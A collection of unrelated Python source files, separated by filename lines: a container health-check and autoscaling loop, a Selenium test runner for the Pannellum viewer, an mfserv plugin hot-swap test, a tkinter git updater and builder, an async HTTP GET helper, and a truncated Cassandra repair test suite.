i = 1
while True:
time.sleep(10)
print("health check batch : ", i)
i += 1
for c, cont in enumerate(r.containers):
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36"}
if requests.get(ip+str(cont['port'])+"/api/v1/_health", headers=headers).status_code != 200:
print("container on : ", cont['port'], " crashed")
r.stopcontainer(c)
r.startnewcontainer(cont['port'], c)
sem1.release()
def fun3():
sem2.acquire()
print("sem2 acquired by fun3")
while True:
time.sleep(120)
print("orchestrating for : ", r.tot_reqs, " requests")
while r.size > int(r.tot_reqs / 20)+1:
r.stopcontainer(r.size-1)
while r.size < int(r.tot_reqs / 20)+1:
r.startnewcontainer(r.size+8000, r.size)
r.tot_reqs = 0
sem2.release()
def handler(sig, frame):
global r
r.__del__()
sys.exit(0)
if __name__ == "__main__":
signal.signal(signal.SIGINT, handler)
#signal.signal(signal.SIGTSTP, handler)
print('press CTRL+C to exit')
thread1 = threading.Thread(target = fun1)
thread2 = threading.Thread(target = fun2)
thread3 = threading.Thread(target = fun3)
thread1.start()
thread2.start()
thread3.start()
|
run_tests.py
|
#!/usr/bin/env python
'''
Run tests for Pannellum, set up with Continuous Integration.
Contributed by Vanessa Sochat, JoSS Review 2019.
See the project repository for licensing information.
'''
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.keys import Keys
from random import choice
from threading import Thread
from selenium import webdriver
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from PIL import Image, ImageChops
import argparse
import json
import io
import numpy
import os
import re
import shutil
import subprocess
import sys
import time
import webbrowser
class PannellumServer(SimpleHTTPRequestHandler):
'''here we subclass SimpleHTTPServer to capture error messages
'''
def log_message(self, format, *args):
'''log to standard error with a date time string,
and then call any subclass specific logging functions
'''
sys.stderr.write("%s - - [%s] %s\n" %
(self.address_string(),
self.log_date_time_string(),
format%args))
# Workaround for error trying to GET html
if not re.search("div", format%args) and not re.search("function", format%args):
if re.search("404", format%args):
raise IOError(format%args)
def log_error(self, format, *args):
'''catch errors in the log_messages instead
'''
pass
class PannellumTester(object):
''' bring up a server with a testing robot
'''
def __init__(self, port=None, browser="Chrome", headless=False):
self.Handler = PannellumServer
if port:
self.port = port
else:
self.port = choice(range(8000, 9999))
print('Selected port is %s' % self.port)
self.httpd = TCPServer(("", self.port), self.Handler)
self.server = Thread(target=self.httpd.serve_forever)
self.server.setDaemon(True)
self.server.start()
self.started = True
self.pause_time = 100
self.browser = None
self.headless = headless
self.display = None
self.driver = browser
def take_screenshot(self, output_file, element_id):
'''take a screenshot and save to file based on element id
'''
element = self.browser.find_element_by_id(element_id)
location = element.location
self.browser.save_screenshot(output_file)
# Now crop to correct size
x = location['x']
y = location['y']
width = location['x'] + element.size['width']
height = location['y'] + element.size['height']
im = Image.open(output_file)
im = im.crop((int(x), int(y), int(width), int(height)))
im.save(output_file)
return Image.open(output_file)
def equal_images(self, image1, image2, name, threshold=3):
'''compare two images, both loaded with PIL, based on the histograms'''
diff = numpy.mean(numpy.array(ImageChops.difference(image1, image2)))
print("%s difference: %s" % (name, diff))
assert diff < threshold
def run_tests(self, create_ref=False):
'''run tests for Pannellum'''
print("Loading page...")
self.get_page("http://localhost:%s/tests/tests.html" % self.port)
print("Running tests...")
time.sleep(5)
assert self.browser.execute_script("return viewer.isLoaded()") == True
# Check equirectangular
assert self.browser.execute_script("return viewer.getScene() == 'equirectangular'")
if create_ref:
self.take_screenshot("tests/equirectangular.png", "panorama")
else:
reference = Image.open("tests/equirectangular.png")
comparator = self.take_screenshot("tests/equirectangular-comparison.png", "panorama")
self.equal_images(reference, comparator, 'equirectangular')
print('PASS: equirectangular')
# Check movement
self.browser.execute_script("viewer.setPitch(30).setYaw(-20).setHfov(90)")
time.sleep(2)
assert self.browser.execute_script(
"return viewer.getPitch() == 30 && viewer.getYaw() == -20 && viewer.getHfov() == 90"
)
self.browser.find_element_by_class_name("pnlm-zoom-in").click()
time.sleep(1)
assert self.browser.execute_script("return viewer.getHfov() == 85")
self.browser.find_element_by_class_name("pnlm-zoom-out").click()
time.sleep(1)
assert self.browser.execute_script("return viewer.getHfov() == 90")
print("PASS: movement")
# Check look at
self.browser.execute_script("viewer.lookAt(-10, 90, 100)")
time.sleep(2)
assert self.browser.execute_script(
"return viewer.getPitch() == -10 && viewer.getYaw() == 90 && viewer.getHfov() == 100"
)
print("PASS: look at")
# Check cube
self.browser.execute_script("viewer.loadScene('cube')")
time.sleep(5)
assert self.browser.execute_script("return viewer.getScene() == 'cube'")
if create_ref:
self.take_screenshot("tests/cube.png", "panorama")
else:
reference = Image.open("tests/cube.png")
comparator = self.take_screenshot("tests/cube-comparison.png", "panorama")
self.equal_images(reference, comparator, 'cube')
# Check hot spot
self.browser.find_element_by_class_name("pnlm-scene").click()
time.sleep(5)
assert self.browser.execute_script("return viewer.getScene() == 'multires'")
print("PASS: hot spot")
# Check multires
if create_ref:
self.take_screenshot("tests/multires.png", "panorama")
else:
reference = Image.open("tests/multires.png")
comparator = self.take_screenshot("tests/multires-comparison.png", "panorama")
self.equal_images(reference, comparator, 'multires')
self.httpd.server_close()
def get_browser(self,name=None):
'''get_browser
return a browser if it hasn't been initialized yet
'''
if name is None:
name=self.driver
log_path = "%s-driver.log" % name.lower()
if self.browser is None:
options = self.get_options()
if name.lower() == "Firefox":
self.browser = webdriver.Firefox(service_log_path=log_path)
else:
self.browser = webdriver.Chrome(service_log_path=log_path,
options=options)
return self.browser
def get_options(self, width=1200, height=800):
'''return options for headless, no-sandbox, and custom width/height
'''
options = webdriver.ChromeOptions()
options.add_argument("headless")
options.add_argument("no-sandbox")
options.add_argument("window-size=%sx%s" %(width, height))
return options
def get_page(self, url, name='Chrome'):
'''get_page
open a particular url, checking for Timeout
'''
if self.browser is None:
self.browser = self.get_browser(name)
try:
return self.browser.get(url)
except TimeoutException:
print('Browser request timeout. Are you connected to the internet?')
self.browser.close()
sys.exit(1)
def stop(self):
'''close any running browser or server, and shut down the robot
'''
if self.browser is not None:
self.browser.close()
self.httpd.server_close()
if self.display is not None:
self.display.close()
## MAIN ########################################################################
def get_parser():
parser = argparse.ArgumentParser(
description="run tests for Pannellum")
parser.add_argument("--port",'-p', dest='port',
help="port to run webserver",
type=int, default=None)
parser.add_argument("--headless", dest='headless',
help="start a display before browser",
action="store_true", default=False)
parser.add_argument("--create-ref", dest='create_ref',
action="store_true", default=False)
parser.add_argument("--browser",'-b', dest='browser',
choices=['Firefox', 'Chrome'],
help="browser driver to use for the robot",
type=str, default="Chrome")
return parser
def main():
parser = get_parser()
try:
args = parser.parse_args()
except:
sys.exit(0)
# The drivers must be on path
here = os.path.abspath(os.path.dirname(__file__))
os.environ['PATH'] = "%s/drivers:%s" %(here, os.environ['PATH'])
os.chdir(here)
# We must be in root directory
os.chdir('../')
# Iniitalize the tester
tester = PannellumTester(browser=args.browser,
port=args.port,
headless=args.headless)
# Run tests
tester.run_tests(create_ref=args.create_ref)
# Clean up shop!
tester.stop()
if __name__ == '__main__':
main()
|
test.py
|
#!/usr/bin/env python3
import datetime
import sys
import requests
import os
import time
import threading
from mfutil import BashWrapperOrRaise
NGINX_PORT = int(os.environ['MFSERV_NGINX_PORT'])
RUN = True
RES = True
BashWrapperOrRaise("rm -Rf foobar")
BashWrapperOrRaise("plugins.uninstall foobar || true")
print(BashWrapperOrRaise("bootstrap_plugin.py create "
"--template=python3_django "
"--no-input foobar"))
print(BashWrapperOrRaise("cd foobar && make release"))
print(BashWrapperOrRaise('cd foobar && plugins.install "$(ls *.plugin)"'))
def continuous_check():
global RES
while RUN:
url = "http://127.0.0.1:%i/foobar" % NGINX_PORT
x = requests.get(url, timeout=3)
if x.status_code != 200:
print("bad status code: %i" % x.status_code)
print(x)
RES = False
if "Hello World" not in x.text:
print("bad output: %s" % x.text)
print(x)
RES = False
time.sleep(0.1)
now_fn = datetime.datetime.now
before = now_fn()
code = 1
while (now_fn() - before).total_seconds() <= 30:
time.sleep(1)
url = "http://127.0.0.1:%i/foobar" % NGINX_PORT
print("trying GET %s..." % url)
try:
x = requests.get(url, timeout=3)
except Exception:
continue
if x.status_code == 200:
if "Hello World" in x.text:
code = 0
break
if code != 0:
print("ERROR: can't get a valid output")
sys.exit(code)
# let's start a continuous_check
t = threading.Thread(target=continuous_check)
t.start()
print(BashWrapperOrRaise('cd foobar && plugins.hotswap "$(ls *.plugin)"'))
RUN = False
t.join()
if RES is False:
sys.exit(1)
BashWrapperOrRaise("plugins.uninstall foobar")
BashWrapperOrRaise("rm -Rf foobar")
print("ok")
sys.exit(0)
|
updater.py
|
from subprocess import call
import os, sys
from os import path
#from tkinter import *
from threading import *
import tkinter as tk
#from tk import tkFileDialog
from tkinter import filedialog as fd
from tkinter import messagebox as mb
#from tk import tkMessageBox
import logging
from logging import handlers
import csv
# Include the generators
#sys.path.append(os.getcwd())
# print sys.path
from generators import *
import generators
## This file implements the project downloadeer.
## It is used for pulling and building all of my software
##
## @author Daniel J. Finnegan
## @date July 2017
####################################################################
class App(tk.Tk):
def __init__(self, master):
self.frame = tk.Frame(master, height=640, width=480)
self.menu = tk.Menu(master)
if sys.platform == 'darwin':
self.appmenu = Menu(self.menu, name = 'apple') # Some extra fiddling about for OSX
self.menu.add_cascade(menu=self.appmenu)
self.appmenu.add_command(label='About Updater')
self.initialize()
def initialize(self):
self.frame.grid()
self.init_vars()
self.init_controls()
self.init_menu()
self.init_gui()
def init_vars(self):
self.project_table = {'': ''} # Empty table
self.project_titles = sorted(self.project_table.keys()) # Get a sorted list of the keys
self.branches = ['master', 'testing']
# self.generators = ['Unity', 'C++', 'LaTeX', 'R']
self.generators = generators.Generators
if sys.platform == 'darwin':
self.project_root = '/home/'
else:
self.project_root = 'C:\\'
# Set the logger
if sys.platform == 'darwin':
self.logger = logging.getLogger()
syslogH = handlers.SysLogHandler(address='/var/run/syslog', facility='local1')
syslogH.ident = 'updater_application:'
self.logger.addHandler(syslogH)
else: # Handle the Windows case
self.logger = logging.getLogger('updater_application')
self.logger.setLevel(logging.INFO)
def init_controls(self):
self.project_root_text = tk.StringVar()
self.project_root_text.set(self.project_root)
self.project_titles_var = tk.StringVar()
self.project_titles_var.set(self.project_titles[0])
self.branches_var = tk.StringVar()
self.branches_var.set(self.branches[0])
self.generators_var = tk.StringVar()
self.generators_var.set(self.generators[0])
def init_menu(self):
if sys.platform == 'darwin': # We need to use the appmenu object for OSX applications
self.appmenu.add_command(label='Quit', command=self.frame.quit)
self.appmenu.add_command(label='Load Projects File', command=self.load_projects)
self.appmenu.add_separator()
else:
self.menu.add_command(label='Quit', command=self.frame.quit)
self.menu.add_command(label='Load Projects File', command=self.load_projects)
root.config(menu=self.menu)
def load_projects(self, *args):
projects_file = tk.tkFileDialog.askopenfilename(filetypes=[('project files', 'txt')], parent=self.frame)
if projects_file is None or projects_file == '':
return
self.project_table = {} # clear the existing table
with open(projects_file) as proj_file: # read in the projects from the file
reader = csv.DictReader(proj_file)
for row in reader:
self.project_table[row['Project Name']] = row['Project URL']
# TODO: Catch errors here in the file reader
self.project_titles = sorted(self.project_table.keys()) # Get a sorted list of the keys
self.project_titles_var.set(self.project_titles[0])
menu = self.projects_options['menu']
menu.delete(0, 'end')
for project in self.project_titles: # Repopulate
menu.add_command(label=project, command=lambda title=project: self.project_titles_var.set(title))
def init_gui(self):
# Option box for selecting the project to install
self.project_label = tk.Label(self.frame, text='Project to Install or Update:')
self.projects_options = tk.OptionMenu(self.frame, self.project_titles_var, '')
self.project_label.grid(column=0, row=0, sticky='W')
self.projects_options.grid(column=1, columnspan=3, row = 0, sticky='W')
# Option box for selecting the project to install
self.branch_label = tk.Label(self.frame, text='Branch to Install or Update:')
self.project_branches = tk.OptionMenu(self.frame, self.branches_var, *self.branches)
self.branch_label.grid(column=0, row=1, sticky='W')
self.project_branches.grid(column=1, columnspan=3, row = 1, sticky='W')
# Entry for specifying the directory to install the project
# Complete with side label and action button
self.directory_label = tk.Label(self.frame, text='Project Directory to Install or Update:')
self.directory_entry = tk.Entry(self.frame, textvariable=self.project_root_text, width=50)
self.set_directory_button = tk.Button(self.frame, text="Set Directory", command=self.find_dir)
self.directory_label.grid(column=0, row=2, sticky='EW')
self.directory_entry.grid(column=1, columnspan=2, row=2, sticky='EW')
self.set_directory_button.grid(column=3, row=2, sticky='EW')
# Action button for creating
self.create_button = tk.Button(self.frame, text='Create', command=self.create_project)
self.project_generators = tk.OptionMenu(self.frame, self.generators_var, *self.generators)
self.create_button.grid(column=0, row=3, sticky='EW')
self.project_generators.grid(column=1, columnspan=2, row = 3, sticky='EW')
# Action button for updating
self.build_button = tk.Button(self.frame, text='Build', command=self.do_build_task)
self.build_button.grid(column=0, row=4, sticky='EW')
self.update_button = tk.Button(self.frame, text='Update', command=self.do_task)
self.update_button.grid(column=1, row=4, columnspan=2, sticky='EW')
# Text box for log output
self.log = tk.Text(self.frame, height=20, takefocus=0)
self.log.grid(column=0, columnspan=4, row=5, sticky='EW')
def find_dir(self):
self.project_root = fd.askdirectory()
if self.project_root is None:
return
self.project_root_text.set(self.project_root)
def build_project(self, project_to_build_dir=None):
if project_to_build_dir is None:
project_to_build_dir = self.project_root
self.log_message('Building the software package...')
sys.path.append(os.path.join(project_to_build_dir, 'scripts'))
os.chdir(os.path.join(project_to_build_dir))
# Import the build script as a python module and then build it
# If no custom build operation is specified, then make a standard call to cmake
from builder import build_project
if build_project.UPDATER_BUILD_CUSTOM:
build_project.build_full_package(project_to_build_dir) # Pass in the root directory
else:
if os.path.isdir(os.path.join(project_to_build_dir, 'bin')):
shutil.rmtree(os.path.join(project_to_build_dir, 'bin'))
os.mkdir(os.path.join(project_to_build_dir, 'bin'))
os.chdir(os.path.join(project_to_build_dir, 'bin'))
rc = call(['cmake'] + build_project.UPDATER_CMAKE_ARGS + ['..'])
if rc != 0:
self.log_message(message='Project is missing a CMakeLists.txt file. Contact the package maintainer')
else:
call(['cmake', '--build', '.'])
self.log_message('Check project directory for build output files.')
def update_project(self):
self.log_message(message='Updating the software package...')
call(['git', '-C', self.project_root, 'checkout', '--', '.']) # Clear any local changes
call(['git', '-C', self.project_root, 'checkout', self.branches_var.get()]) # Checkout the master branch
call(['git', '-C', self.project_root, 'pull', 'origin', self.branches_var.get()]) # Pull the changes made in the project from the repo
self.log_message('Software updated!')
def download_project(self):
self.log_message(message='Downloading the software...')
project_url = self.project_table[self.project_titles_var.get()]
call(['git', '-C', self.project_root, 'clone', project_url, self.project_titles_var.get()]) # Clone the project from the remote repo
self.project_root = os.path.join(self.project_root, self.project_titles_var.get()) # Update the directory name to reflect the downloaded package
call(['git', '-C', self.project_root, 'checkout', self.branches_var.get()]) # Checkout the branch
self.log_message('Software downloaded!')
def do_task(self):
# Check if the current selected project is empty
if self.project_titles_var.get() == '':
mb.showerror(title='Missing Project', message='Please load the projects list file')
return
# Add paths
if sys.platform == 'darwin':
# sys.path.append('/usr/local/bin')
os.environ['PATH'] += ':' + '/usr/local/bin' # Patch for homebrew installations
elif sys.platform == 'win32':
self.log_message(message='Windows is buggy. Please report any issues')
else:
self.log_message(message='Platform unsupported. Aborting')
return
rc = call(['git', '-C', self.project_root, 'status']) # Run git status
if rc == 0:
def update_in_thread():
self.update_button.config(state=tk.DISABLED)
self.create_button.config(state=tk.DISABLED)
self.build_button.config(state=tk.DISABLED)
self.update_project()
self.build_project() # Pass in the project root folder
self.update_button.config(state=tk.ACTIVE)
self.create_button.config(state=tk.ACTIVE)
self.build_button.config(state=tk.ACTIVE)
return
thread = Thread(target=update_in_thread)
thread.start()
return thread
else:
def download_in_thread():
self.update_button.config(state=tk.DISABLED)
self.create_button.config(state=tk.DISABLED)
self.build_button.config(state=tk.DISABLED)
self.download_project()
self.build_project()
self.update_button.config(state=tk.ACTIVE)
self.create_button.config(state=tk.ACTIVE)
self.build_button.config(state=tk.ACTIVE)
return
thread = Thread(target=download_in_thread)
thread.start()
return thread
def create_project(self):
def create_in_thread():
self.update_button.config(state=tk.DISABLED)
self.create_button.config(state=tk.DISABLED)
self.build_button.config(state=tk.DISABLED)
# Load the generator based on name
project_generator = generators.load_generator(self.generators_var.get(), self.project_root_text.get())
self.log_message(message='Generating the project...')
rc = project_generator.generate_project()
if rc == 0:
self.log_message('Project generated!')
else:
self.log_message('Project not generated. Check log for issues')
self.update_button.config(state=tk.ACTIVE)
self.create_button.config(state=tk.ACTIVE)
self.build_button.config(state=tk.ACTIVE)
thread = Thread(target=create_in_thread)
thread.start()
return thread
def do_build_task(self):
def create_in_thread():
self.update_button.config(state=tk.DISABLED)
self.create_button.config(state=tk.DISABLED)
self.build_button.config(state=tk.DISABLED)
print ('Building the project at', self.project_root_text.get())
self.build_project(self.project_root_text.get()) # Pass in the project root folder
self.update_button.config(state=tk.ACTIVE)
self.create_button.config(state=tk.ACTIVE)
self.build_button.config(state=tk.ACTIVE)
thread = Thread(target=create_in_thread)
thread.start()
return thread
def log_message(self, message=''):
self.logger.info(message) # Log to the logger too
self.log.insert(tk.INSERT, message)
self.log.insert(tk.INSERT, '\n')
self.log.see(tk.END)
if __name__ == '__main__':
root = tk.Tk()
root.title('Experiment Updater')
# root.title('Experiment Updater (Testing branch)')
app = App(root)
root.mainloop()
# root.destroy()
|
api.py
|
import socket
import urllib.parse
from selectors import DefaultSelector, EVENT_WRITE, EVENT_READ
from threading import Thread
from ..core.eventQueue import eventQueue
from ..core.eventloop import LoopManager
@LoopManager.asyncapi
def get(*, url, callback, asyncDone):
urlObj = urllib.parse.urlparse(url)
selector = DefaultSelector()
sock = socket.socket()
sock.setblocking(False)
def connected():
selector.unregister(sock.fileno())
selector.register(sock.fileno(), EVENT_READ, responded)
sock.send(
f"""GET {urlObj.path if urlObj.path != '' else '/'}{'?' if urlObj.query != '' else '' + urlObj.query} HTTP/1.0\r\n\r\n"""
.encode('ascii')
)
responseData = bytes()
def responded():
nonlocal responseData
chunk = sock.recv(4096)
if chunk:
responseData += chunk
else:
selector.unregister(sock.fileno())
eventQueue.pushCallback(
lambda: (callback(responseData), asyncDone(responseData)))
nonlocal __stop
__stop = True
__stop = False
def loop():
while True:
events = selector.select()
for event_key, event_mask in events:
cbk = event_key.data
cbk()
if __stop:
break
selector.register(sock.fileno(), EVENT_WRITE, connected)
try:
sock.connect(
(urlObj.hostname, urlObj.port if urlObj.port != None else 80)
)
except BlockingIOError:
pass
Thread(target=loop).start()
|
repair_test.py
|
import os
import os.path
import threading
import time
import re
import pytest
import logging
from collections import namedtuple
from threading import Thread
from cassandra import ConsistencyLevel
from cassandra.query import SimpleStatement
from ccmlib.node import ToolError
from dtest import FlakyRetryPolicy, Tester, create_ks, create_cf, mk_bman_path
from tools.data import insert_c1c2, query_c1c2
from tools.jmxutils import JolokiaAgent, make_mbean
from repair_tests.incremental_repair_test import assert_parent_repair_session_count
since = pytest.mark.since
logger = logging.getLogger(__name__)
def _repair_options(version, ks='', cf=None, sequential=True):
"""
Function for assembling appropriate repair CLI options,
based on C* version, as defaults have changed.
@param ks The keyspace to repair
@param cf The table to repair
@param sequential If the repair should be a sequential repair [vs parallel]
"""
opts = []
# since version 2.2, default is parallel, otherwise it's sequential
if sequential:
if version >= '2.2':
opts += ['-seq']
else:
if version < '2.2':
opts += ['-par']
# test with full repair
if version >= '2.2':
opts += ['-full']
if ks:
opts += [ks]
if cf:
opts += [cf]
return opts
class BaseRepairTest(Tester):
def check_rows_on_node(self, node_to_check, rows, found=None, missings=None, restart=True):
"""
Function to verify the rows on a given node, without interference
from the other nodes in the cluster
@param node_to_check The given node to check. Should be the node, not the index
@param rows The number of rows we expect
@param found A list of partition keys that we expect to be on the node
@param missings A list of partition keys we expect NOT to be on the node
@param restart Whether or not we should restart the nodes we shut down to perform the assertions. Should only be False if the call to check_rows_on_node is the last line in the test.
"""
if found is None:
found = []
if missings is None:
missings = []
stopped_nodes = []
for node in list(self.cluster.nodes.values()):
if node.is_running() and node is not node_to_check:
stopped_nodes.append(node)
node.stop(wait_other_notice=True)
session = self.patient_exclusive_cql_connection(node_to_check, 'ks')
result = list(session.execute("SELECT * FROM cf LIMIT {}".format(rows * 2), timeout=10))
assert len(result) == rows
for k in found:
query_c1c2(session, k, ConsistencyLevel.ONE)
for k in missings:
query = SimpleStatement("SELECT c1, c2 FROM cf WHERE key='k{}'".format(k), consistency_level=ConsistencyLevel.ONE)
res = list(session.execute(query))
assert len([x for x in res if len(x) != 0]) == 0, res
if restart:
for node in stopped_nodes:
node.start(wait_for_binary_proto=True)
def _populate_cluster(self, start=True):
cluster = self.cluster
# Disable hinted handoff and set batch commit log so this doesn't
# interfere with the test (this must be after the populate)
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
logger.debug("Starting cluster..")
cluster.populate(3).start()
node1, node2, node3 = cluster.nodelist()
session = self.patient_cql_connection(node1, retry_policy=FlakyRetryPolicy(max_retries=15))
create_ks(session, 'ks', 3)
if cluster.version() < '4.0':
create_cf(session, 'cf', read_repair=0.0, columns={'c1': 'text', 'c2': 'text'})
else:
create_cf(session, 'cf', columns={'c1': 'text', 'c2': 'text'})
# Insert 1000 keys, kill node 3, insert 1 key, restart node 3, insert 1000 more keys
logger.debug("Inserting data...")
insert_c1c2(session, n=1000, consistency=ConsistencyLevel.ALL, ks='ks')
node3.flush()
node3.stop(wait_other_notice=True)
insert_c1c2(session, keys=(1000, ), consistency=ConsistencyLevel.TWO, ks='ks')
node3.start(wait_for_binary_proto=True)
insert_c1c2(session, keys=list(range(1001, 2001)), consistency=ConsistencyLevel.ALL, ks='ks')
cluster.flush()
def _repair_and_verify(self, sequential=True):
cluster = self.cluster
node1, node2, node3 = cluster.nodelist()
# Verify that node3 has only 2000 keys
logger.debug("Checking data on node3...")
self.check_rows_on_node(node3, 2000, missings=[1000])
# Verify that node1 has 2001 keys
logger.debug("Checking data on node1...")
self.check_rows_on_node(node1, 2001, found=[1000])
# Verify that node2 has 2001 keys
logger.debug("Checking data on node2...")
self.check_rows_on_node(node2, 2001, found=[1000])
time.sleep(10) # see CASSANDRA-4373
# Run repair
start = time.time()
logger.debug("starting repair...")
node1.repair(_repair_options(self.cluster.version(), ks='ks', sequential=sequential))
logger.debug("Repair time: {end}".format(end=time.time() - start))
# Validate that only one range was transfered
out_of_sync_logs = node1.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync".format(cluster.address_regex(), cluster.address_regex()))
assert len(out_of_sync_logs) == 2, "Lines matching: " + str([elt[0] for elt in out_of_sync_logs])
valid_out_of_sync_pairs = [{node1.address(), node3.address()},
{node2.address(), node3.address()}]
for line, m in out_of_sync_logs:
num_out_of_sync_ranges, out_of_sync_nodes = m.group(3), {m.group(1), m.group(2)}
assert int(num_out_of_sync_ranges) == 1, \
"Expecting 1 range out of sync for {}, but saw {}".format(out_of_sync_nodes, num_out_of_sync_ranges)
assert out_of_sync_nodes, valid_out_of_sync_pairs in str(out_of_sync_nodes)
# Check node3 now has the key
self.check_rows_on_node(node3, 2001, found=[1000], restart=False)
class TestRepair(BaseRepairTest):
@since('4.0')
def test_parent_repair_session_cleanup(self):
"""
Calls range_tombstone_digest with a sequential repair and verifies if
all ParentRepairSession objects are cleaned
@jira_ticket CASSANDRA-16446
"""
self._range_tombstone_digest(sequential=True)
assert_parent_repair_session_count(self.cluster.nodes.values(), 0)
@since('2.2.1', max_version='4')
def test_no_anticompaction_after_dclocal_repair(self):
"""
* Launch a four node, two DC cluster
* Start a -local repair on node1 in dc1
* Assert that the dc1 nodes see repair messages
* Assert that the dc2 nodes do not see repair messages
* Assert no nodes anticompact
# TODO: Verify the anticompaction with sstablemetadata, not just logs
@jira_ticket CASSANDRA-10422
"""
cluster = self.cluster
logger.debug("Starting cluster..")
cluster.populate([2, 2]).start()
node1_1, node2_1, node1_2, node2_2 = cluster.nodelist()
node1_1.stress(stress_options=['write', 'n=50K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=4)', '-rate', 'threads=50'])
node1_1.nodetool("repair -local keyspace1 standard1")
assert node1_1.grep_log("Not a global repair")
assert node2_1.grep_log("Not a global repair")
# dc2 should not see these messages:
assert not node1_2.grep_log("Not a global repair")
assert not node2_2.grep_log("Not a global repair")
# and no nodes should do anticompaction:
for node in cluster.nodelist():
assert not node.grep_log("Starting anticompaction")
# @pytest.mark.skipif(CASSANDRA_VERSION_FROM_BUILD == '3.9', reason="Test doesn't run on 3.9")
@pytest.mark.skip_version('3.9')
def test_nonexistent_table_repair(self):
"""
* Check that repairing a non-existent table fails
@jira_ticket CASSANDRA-12279
"""
self.fixture_dtest_setup.ignore_log_patterns = [r'Unknown keyspace/cf pair']
cluster = self.cluster
logger.debug('Starting nodes')
cluster.populate(2).start()
node1, _ = cluster.nodelist()
logger.debug('Creating keyspace and tables')
node1.stress(stress_options=['write', 'n=1', 'no-warmup',
'cl=ONE', '-schema', 'replication(factor=2)',
'-rate', 'threads=1'])
logger.debug('Repairing non-existent table')
def repair_non_existent_table():
global nodetool_error
try:
node1.nodetool('repair keyspace1 standard2')
except Exception as e:
nodetool_error = e
# Launch in a external thread so it does not hang process
t = Thread(target=repair_non_existent_table)
t.start()
t.join(timeout=60)
assert not t.is_alive(), 'Repair thread on inexistent table is still running'
if self.cluster.version() >= '2.2':
node1.watch_log_for("Unknown keyspace/cf pair", timeout=60)
# Repair only finishes with error status after CASSANDRA-12508 on 3.0+
if self.cluster.version() >= '3.0':
assert 'nodetool_error' in globals() and isinstance(nodetool_error, ToolError), \
'Repair thread on inexistent table did not throw exception'
logger.debug(repr(nodetool_error))
assert 'Unknown keyspace/cf pair' in repr(nodetool_error),\
'Repair thread on inexistent table did not detect inexistent table.'
@since('2.2.1', max_version='4')
def test_no_anticompaction_after_hostspecific_repair(self):
"""
* Launch a four node, two DC cluster
* Start a repair on all nodes, by enumerating with -hosts
* Assert all nodes see a repair messages
* Assert no nodes anticompact
# TODO: Verify the anticompaction with sstablemetadata, not just logs
@jira_ticket CASSANDRA-10422
"""
cluster = self.cluster
logger.debug("Starting cluster..")
cluster.populate([2, 2]).start()
node1_1, node2_1, node1_2, node2_2 = cluster.nodelist()
node1_1.stress(stress_options=['write', 'n=100K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=4)', '-rate', 'threads=50'])
node1_1.nodetool("repair -hosts 127.0.0.1,127.0.0.2,127.0.0.3,127.0.0.4 keyspace1 standard1")
for node in cluster.nodelist():
assert node.grep_log("Not a global repair")
for node in cluster.nodelist():
assert not node.grep_log("Starting anticompaction")
@since('2.2.4', max_version='4')
def test_no_anticompaction_after_subrange_repair(self):
"""
* Launch a three node, two DC cluster
* Start a repair on a token range
* Assert all nodes see repair messages
* Assert no nodes anticompact
# TODO: Verify the anticompaction with sstablemetadata, not just logs
@jira_ticket CASSANDRA-10422
"""
cluster = self.cluster
logger.debug("Starting cluster..")
cluster.populate(3).start()
node1, node2, node3 = cluster.nodelist()
node1.stress(stress_options=['write', 'n=50K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=3)', '-rate', 'threads=50'])
node1.nodetool("repair -st 0 -et 1000 keyspace1 standard1")
for node in cluster.nodelist():
assert node.grep_log("Not a global repair")
for node in cluster.nodelist():
assert not node.grep_log("Starting anticompaction")
def _get_repaired_data(self, node, keyspace):
"""
Based on incremental_repair_test.py:TestIncRepair implementation.
"""
_sstable_name = re.compile('SSTable: (.+)')
_repaired_at = re.compile(r'Repaired at: (\d+)')
_sstable_data = namedtuple('_sstabledata', ('name', 'repaired'))
out = node.run_sstablemetadata(keyspace=keyspace).stdout
def matches(pattern):
return [_f for _f in [pattern.match(l) for l in out.split('\n')] if _f]
names = [m.group(1) for m in matches(_sstable_name)]
repaired_times = [int(m.group(1)) for m in matches(_repaired_at)]
assert names
assert repaired_times
return [_sstable_data(*a) for a in zip(names, repaired_times)]
@since('2.2.10', max_version='4')
def test_no_anticompaction_of_already_repaired(self):
"""
* Launch three node cluster and stress with RF2
* Do incremental repair to have all sstables flagged as repaired
* Stop node2, stress, start again and run full -pr repair
* Verify that none of the already repaired sstables have been anti-compacted again
@jira_ticket CASSANDRA-13153
"""
cluster = self.cluster
logger.debug("Starting cluster..")
# disable JBOD conf since the test expects sstables to be on the same disk
cluster.set_datadir_count(1)
cluster.populate(3).start()
node1, node2, node3 = cluster.nodelist()
# we use RF to make sure to cover only a set of sub-ranges when doing -full -pr
node1.stress(stress_options=['write', 'n=50K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=2)', '-rate', 'threads=50'])
# disable compaction to make sure that we won't create any new sstables with repairedAt 0
node1.nodetool('disableautocompaction keyspace1 standard1')
# Do incremental repair of all ranges. All sstables are expected for have repairedAt set afterwards.
node1.nodetool("repair keyspace1 standard1")
meta = self._get_repaired_data(node1, 'keyspace1')
repaired = set([m for m in meta if m.repaired > 0])
assert len(repaired) == len(meta)
# stop node2, stress and start full repair to find out how synced ranges affect repairedAt values
node2.stop(wait_other_notice=True)
node1.stress(stress_options=['write', 'n=40K', 'no-warmup', 'cl=ONE', '-rate', 'threads=50'])
node2.start(wait_for_binary_proto=True)
node1.nodetool("repair -full -pr keyspace1 standard1")
meta = self._get_repaired_data(node1, 'keyspace1')
repairedAfterFull = set([m for m in meta if m.repaired > 0])
# already repaired sstables must remain untouched
assert repaired.intersection(repairedAfterFull) == repaired
@since('2.2.1', '4')
def test_anticompaction_after_normal_repair(self):
"""
* Launch a four node, two DC cluster
* Start a normal repair
* Assert every node anticompacts
@jira_ticket CASSANDRA-10422
"""
cluster = self.cluster
logger.debug("Starting cluster..")
cluster.populate([2, 2]).start()
